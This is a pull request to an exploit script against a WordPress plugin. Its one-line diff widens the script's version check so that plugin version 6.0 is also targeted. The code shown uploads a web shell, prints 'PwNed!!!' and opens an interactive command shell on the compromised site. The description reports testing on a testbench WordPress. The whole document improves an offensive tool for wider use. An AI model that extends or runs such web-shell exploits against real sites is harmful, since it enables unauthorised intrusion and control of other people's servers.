### PR TITLE
Updated exploit to allow versions of the plugin == to 6.0

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -95,7 +95,7 @@ def main():
     version = float(re.findall('Stable tag\: (.*?)\nLicense\:', r.text)[0])
     
     # Uploading shell
-    if upload_shell(url) and version < 6.9 and version > 6.0:
+    if upload_shell(url) and version < 6.9 and version >= 6.0:
         print(Fore.GREEN + "[+] Shell uploaded successfully\n" + Fore.RED + "PwNed!!!" + Fore.RESET)
         try:
             Shell().cmdloop()


### PR DESCRIPTION
The version 6.0 of the plugin is also vulnerable and should not be excluded from the supported versions. 

I tested the exploit on the version 6.0 of the plugin on my testbench wordpress and it works flawlessly.